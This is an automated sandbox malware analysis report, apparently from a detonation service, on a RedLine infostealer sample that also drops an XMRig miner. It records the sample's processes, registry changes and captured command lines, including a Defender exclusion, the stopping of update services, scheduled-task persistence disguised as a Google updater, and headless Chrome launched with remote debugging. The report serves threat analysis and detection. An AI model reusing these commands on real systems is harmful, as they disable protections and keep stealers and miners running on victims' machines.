Malware Analysis Report

2025-01-18 07:59

Sample ID 230812-knwesach9y
Target 3812-127-0x0000000003910000-0x0000000003944000-memory.dmp
SHA256 410f6f4b18b743455f7b1b02b7e605cfaf28b58821d5bed2b3f1d387fe13d425
Tags
redline logsdiller cloud (tg: @logsdillabot) evasion infostealer spyware stealer themida xmrig miner
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

410f6f4b18b743455f7b1b02b7e605cfaf28b58821d5bed2b3f1d387fe13d425

Threat Level: Known bad

The file 3812-127-0x0000000003910000-0x0000000003944000-memory.dmp was found to be: Known bad.

Malicious Activity Summary

redline logsdiller cloud (tg: @logsdillabot) evasion infostealer spyware stealer themida xmrig miner

RedLine

Redline family

xmrig

Suspicious use of NtCreateUserProcessOtherParentProcess

XMRig Miner payload

Downloads MZ/PE file

Drops file in Drivers directory

Stops running service(s)

Executes dropped EXE

Loads dropped DLL

Themida packer

Reads user/profile data of web browsers

Legitimate hosting services abused for malware hosting/C2

Accesses cryptocurrency files/wallets, possible credential harvesting

Looks up external IP address via web service

Drops file in System32 directory

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of SetThreadContext

Drops file in Program Files directory

Launches sc.exe

Enumerates physical storage devices

Program crash

Unsigned PE

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: LoadsDriver

Modifies data under HKEY_USERS

Modifies system certificate store

Suspicious behavior: EnumeratesProcesses

Creates scheduled task(s)

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-08-12 08:45

Signatures

Redline family

redline

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-08-12 08:45

Reported

2023-08-12 08:47

Platform

win7-20230712-en

Max time kernel

52s

Max time network

148s

Command Line

C:\Windows\Explorer.EXE

Signatures

RedLine

infostealer redline

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 1824 created 1228 N/A C:\Windows\Temp\setup.exe C:\Windows\Explorer.EXE
PID 1824 created 1228 N/A C:\Windows\Temp\setup.exe C:\Windows\Explorer.EXE
PID 1824 created 1228 N/A C:\Windows\Temp\setup.exe C:\Windows\Explorer.EXE
PID 1824 created 1228 N/A C:\Windows\Temp\setup.exe C:\Windows\Explorer.EXE
PID 1824 created 1228 N/A C:\Windows\Temp\setup.exe C:\Windows\Explorer.EXE

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\System32\drivers\etc\hosts C:\Windows\Temp\setup.exe N/A

Stops running service(s)

evasion

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\mi.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cli.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cc.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A

Reads user/profile data of web browsers

spyware stealer

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\cc.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1984 set thread context of 1976 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Google\Chrome\updater.exe C:\Windows\Temp\setup.exe N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\cli.exe

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 C:\Users\Admin\AppData\Local\Temp\3812-127-0x0000000003910000-0x0000000003944000-memory.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 C:\Users\Admin\AppData\Local\Temp\3812-127-0x0000000003910000-0x0000000003944000-memory.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 C:\Users\Admin\AppData\Local\Temp\3812-127-0x0000000003910000-0x0000000003944000-memory.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 C:\Users\Admin\AppData\Local\Temp\3812-127-0x0000000003910000-0x0000000003944000-memory.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\3812-127-0x0000000003910000-0x0000000003944000-memory.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2792 wrote to memory of 548 N/A C:\Users\Admin\AppData\Local\Temp\3812-127-0x0000000003910000-0x0000000003944000-memory.exe C:\Users\Admin\AppData\Local\Temp\mi.exe
PID 2792 wrote to memory of 548 N/A C:\Users\Admin\AppData\Local\Temp\3812-127-0x0000000003910000-0x0000000003944000-memory.exe C:\Users\Admin\AppData\Local\Temp\mi.exe
PID 2792 wrote to memory of 548 N/A C:\Users\Admin\AppData\Local\Temp\3812-127-0x0000000003910000-0x0000000003944000-memory.exe C:\Users\Admin\AppData\Local\Temp\mi.exe
PID 2792 wrote to memory of 548 N/A C:\Users\Admin\AppData\Local\Temp\3812-127-0x0000000003910000-0x0000000003944000-memory.exe C:\Users\Admin\AppData\Local\Temp\mi.exe
PID 2792 wrote to memory of 1984 N/A C:\Users\Admin\AppData\Local\Temp\3812-127-0x0000000003910000-0x0000000003944000-memory.exe C:\Users\Admin\AppData\Local\Temp\cli.exe
PID 2792 wrote to memory of 1984 N/A C:\Users\Admin\AppData\Local\Temp\3812-127-0x0000000003910000-0x0000000003944000-memory.exe C:\Users\Admin\AppData\Local\Temp\cli.exe
PID 2792 wrote to memory of 1984 N/A C:\Users\Admin\AppData\Local\Temp\3812-127-0x0000000003910000-0x0000000003944000-memory.exe C:\Users\Admin\AppData\Local\Temp\cli.exe
PID 2792 wrote to memory of 1984 N/A C:\Users\Admin\AppData\Local\Temp\3812-127-0x0000000003910000-0x0000000003944000-memory.exe C:\Users\Admin\AppData\Local\Temp\cli.exe
PID 2792 wrote to memory of 1668 N/A C:\Users\Admin\AppData\Local\Temp\3812-127-0x0000000003910000-0x0000000003944000-memory.exe C:\Users\Admin\AppData\Local\Temp\cc.exe
PID 2792 wrote to memory of 1668 N/A C:\Users\Admin\AppData\Local\Temp\3812-127-0x0000000003910000-0x0000000003944000-memory.exe C:\Users\Admin\AppData\Local\Temp\cc.exe
PID 2792 wrote to memory of 1668 N/A C:\Users\Admin\AppData\Local\Temp\3812-127-0x0000000003910000-0x0000000003944000-memory.exe C:\Users\Admin\AppData\Local\Temp\cc.exe
PID 2792 wrote to memory of 1668 N/A C:\Users\Admin\AppData\Local\Temp\3812-127-0x0000000003910000-0x0000000003944000-memory.exe C:\Users\Admin\AppData\Local\Temp\cc.exe
PID 548 wrote to memory of 1824 N/A C:\Users\Admin\AppData\Local\Temp\mi.exe C:\Windows\Temp\setup.exe
PID 548 wrote to memory of 1824 N/A C:\Users\Admin\AppData\Local\Temp\mi.exe C:\Windows\Temp\setup.exe
PID 548 wrote to memory of 1824 N/A C:\Users\Admin\AppData\Local\Temp\mi.exe C:\Windows\Temp\setup.exe
PID 548 wrote to memory of 1824 N/A C:\Users\Admin\AppData\Local\Temp\mi.exe C:\Windows\Temp\setup.exe
PID 1984 wrote to memory of 1976 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1984 wrote to memory of 1976 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1984 wrote to memory of 1976 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1984 wrote to memory of 1976 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1984 wrote to memory of 1976 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1984 wrote to memory of 1976 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1984 wrote to memory of 1976 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1984 wrote to memory of 1976 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1984 wrote to memory of 1976 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1984 wrote to memory of 1244 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\SysWOW64\WerFault.exe
PID 1984 wrote to memory of 1244 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\SysWOW64\WerFault.exe
PID 1984 wrote to memory of 1244 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\SysWOW64\WerFault.exe
PID 1984 wrote to memory of 1244 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\SysWOW64\WerFault.exe
PID 2624 wrote to memory of 2668 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 2624 wrote to memory of 2668 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 2624 wrote to memory of 2668 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 2624 wrote to memory of 1072 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 2624 wrote to memory of 1072 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 2624 wrote to memory of 1072 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 2624 wrote to memory of 2508 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 2624 wrote to memory of 2508 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 2624 wrote to memory of 2508 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 2624 wrote to memory of 1628 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 2624 wrote to memory of 1628 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 2624 wrote to memory of 1628 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 2624 wrote to memory of 2204 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 2624 wrote to memory of 2204 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 2624 wrote to memory of 2204 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 1088 wrote to memory of 2492 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1088 wrote to memory of 2492 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1088 wrote to memory of 2492 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1088 wrote to memory of 2312 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1088 wrote to memory of 2312 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1088 wrote to memory of 2312 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1088 wrote to memory of 2920 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1088 wrote to memory of 2920 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1088 wrote to memory of 2920 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2224 wrote to memory of 2960 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\schtasks.exe
PID 2224 wrote to memory of 2960 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\schtasks.exe
PID 2224 wrote to memory of 2960 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\schtasks.exe
PID 1088 wrote to memory of 2972 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1088 wrote to memory of 2972 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1088 wrote to memory of 2972 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1668 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\cc.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1668 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\cc.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1668 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\cc.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1668 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\cc.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1716 wrote to memory of 1676 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\3812-127-0x0000000003910000-0x0000000003944000-memory.exe

"C:\Users\Admin\AppData\Local\Temp\3812-127-0x0000000003910000-0x0000000003944000-memory.exe"

C:\Users\Admin\AppData\Local\Temp\mi.exe

"C:\Users\Admin\AppData\Local\Temp\mi.exe"

C:\Users\Admin\AppData\Local\Temp\cli.exe

"C:\Users\Admin\AppData\Local\Temp\cli.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\cc.exe

"C:\Users\Admin\AppData\Local\Temp\cc.exe"

C:\Windows\Temp\setup.exe

"C:\Windows\Temp\setup.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1984 -s 108

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lwilj#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=10094 --headless --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User DataLHM95" --profile-directory="Default"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User DataLHM95" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User DataLHM95\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User DataLHM95" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc8,0xcc,0xd0,0x9c,0xd4,0x7feefa89758,0x7feefa89768,0x7feefa89778

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=1092 --field-trial-handle=1180,i,12609137504146730832,15401685145179315152,131072 --disable-features=PaintHolding /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --headless --use-angle=swiftshader-webgl --headless --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --mojo-platform-channel-handle=832 --field-trial-handle=1180,i,12609137504146730832,15401685145179315152,131072 --disable-features=PaintHolding /prefetch:2

C:\Windows\system32\taskeng.exe

taskeng.exe {4D283B43-C452-426D-BE22-A40709CCA62C} S-1-5-18:NT AUTHORITY\System:Service:

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --first-renderer-process --remote-debugging-port=10094 --allow-pre-commit-input --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --mojo-platform-channel-handle=1564 --field-trial-handle=1180,i,12609137504146730832,15401685145179315152,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=10094 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=1916 --field-trial-handle=1180,i,12609137504146730832,15401685145179315152,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=10094 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2436 --field-trial-handle=1180,i,12609137504146730832,15401685145179315152,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=10094 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=1932 --field-trial-handle=1180,i,12609137504146730832,15401685145179315152,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

